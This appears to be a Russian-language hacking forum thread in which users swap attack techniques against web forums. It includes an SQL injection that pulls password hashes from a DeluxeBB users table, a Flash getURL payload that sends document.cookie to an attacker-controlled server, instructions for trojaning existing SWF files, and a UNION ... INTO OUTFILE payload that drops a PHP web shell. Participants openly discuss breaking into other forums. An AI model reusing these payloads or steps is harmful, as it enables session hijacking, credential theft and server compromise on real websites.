А саму скулю подставлял: Code: misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0 ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users% Если не работает- стало быть либо пофиксено, либо скуля в сплойте кривая.
Подставлял! Похоже и правда профиксено! Ничего нету не ошибки, не информации! Ребятки подскажите, что еще можно туда вставить!
И еще вопрос (извините, если замучил)… Насколько я понимаю данный баг надо впихивать через флешку (swf)?? Code: getURL("javascript:function blab(){}var scriptNode = +document.createElement('script'); document.getElementsByTagName('body')[0].appendChild(scriptNode);scriptNode.language='java script';scriptNode.src= 'http://www.YourServer/UrPHPpage.php?Cookie='+document.cookie +;blab();");
SeeJay Тебе понадобится Flash-редактор "Marcomedia Flash" версии 8 или более, а так же браузер с установленным flash-плагином. С помощью Flash-ролика заставим браузер выполнить простейший JS-код: Открой Macromedia Flash и создай новый ролик. В первом кадре нарисуй что угодно. Затем на линии кадров кликни правой кнопкой мыши на первом кадре и, в появившемся меню, выбери пункт "Actions". Внизу появится текстовое поле для AS-кода. В этом поле ты должен вписать код который вызовет выполнение JS-сценария. Сделать это можно с помощью функции getURL() которой в виде единственного параметра нужно передать следующую строку: "javascript:код". У тебя должна получится всего одна строка следующего содержания: в твоем случае это: Сохрани полученный Flash-ролик в какой-либо папке, опубликуй (меню File->Publish) и в ней же создай html-файл следующего содержания: поидее должно работать) главное не падай в минуса..
Написал простенький скрипт на php, подобрал колечество столбцов, вывел USER() и остальную инфу, НО читать файлы не получается. Пользуюсь денвером. Подскажите как файлы читать. Что LOAD_FILE() это я знаю, а путь ни как подобрать не могу.
Дааааааа… Форум то мой пропатчен от и до! Буду пробовать через другие залезать! Буду, благодарен совету! С уважением и благодарностью SeeJay!
PHP: class hek{ function hek() { } static function main(mc) { getURL("javascript:alert(document.cookie);"); } } Далее компилим Code: mtasc.exe -swf hek.swf -main -header 1:1:1 hek.as заливаем куда надо и всё собственно Можно протроянить уже существующее swf приложение с помощью swfcombine из пака Swftools Анализируем приложение в которое будем вживлять наш злостный кодес с помощью swfdump Code: swfdump.exe hek.swf компилим с нужными параметрами злобнокодес (а именно меняем флаг -header) Code: mtasc.exe -swf hek.swf -main -header x:y:z hek.as x и y - размеры, z - частота кадров в секунду и вживляем Code: swfcombine.exe -o hek_movie.swf -T hek.swf movie.swf
>> а уязвимости движков на файлах и на базах сильна отличаются? xss/lfi/rfi/exec - остаются такими же в движках на текстовых файлах. Единственное чего нету это sql-inj.
Подскажите , есть слепок БД одного форума . Смогу ли я методом INSERT INTO FILE залить туда шелл ? Если можно с примером , в mysql не силён Спасибо .
Термин "слепок БД" мне не знаком. Могу предположить, что это дамп базы. С дампом ты шелл, конечно, не зальешь. Метода INSERT INTO FILE нету =\. В случае с гипотетической инъекцией, можно сделать так: http://site.ru/?id=-1+UNION+SELECT+1,'<?php system($_GET[cmd]); ?>',3+INTO+OUTFILE+'полный путь до файла'/*. Выполнится, если есть file_priv в mysql.user и magic_quotes_gpc=off.
